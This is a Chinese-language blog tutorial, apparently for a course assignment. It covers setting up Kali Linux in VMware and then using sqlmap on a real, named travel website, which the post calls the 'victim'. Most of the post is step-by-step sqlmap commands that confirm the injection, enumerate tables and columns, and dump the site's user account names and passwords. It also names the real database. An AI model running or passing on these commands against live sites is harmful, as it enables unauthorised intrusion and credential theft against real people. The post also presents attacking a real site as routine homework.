一、準備作業
如果只在學校的電腦上耍可以跳過;
否則的話
需要安裝VM Ware
安裝Kali Linux虛擬機
這個教程很詳細
https://blog.csdn.net/qq_40950957/article/details/80468030
其實虛擬機遲早都得學,都得用,我建議早點在自己電腦上裝上
二、打開VM Ware 和 Kali linux
準備作業做好之后有手就行
三、打開Sqlmap工具
在這兒
四、找一個受害者(網站)
網站老師給的PPT里有,這里用最后一個做示范
五、進行迫害
1、先看看能不能進行sql注入
PS:讓你輸入Y/n的時候一律輸Y就完了(Y用小寫也是可以的);
-u后面的是自己選的網址
sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1
一切正常的話大概會進到這塊地方;
說明這個網站是可以的
2、爆表名
sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 –tables
一切正常的話…
就能看到兩個database(資料庫)
這里只貼了一個
找到那個類似于user這樣的資料表,記下它在哪個資料庫下面,實體中是 tourtw_new17tour 這個資料庫
3、爆列名
user是你剛剛找到的表;名字可能類似user不一定就是user
sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 --columns -T "users"
一切順利的話…
4、就可以看到我們的目標了
就是那個userAccount 和userPassword
記得類比為自己的(小聲bb)
sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 --dump -C "userAccount,userPassword"
最終結果
六、作業上傳
暫時不用交,結課之后交
現階段只要寫個word
把步驟寫好,每一步執行后把結果截圖貼到word里
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/233913.html
標籤:其他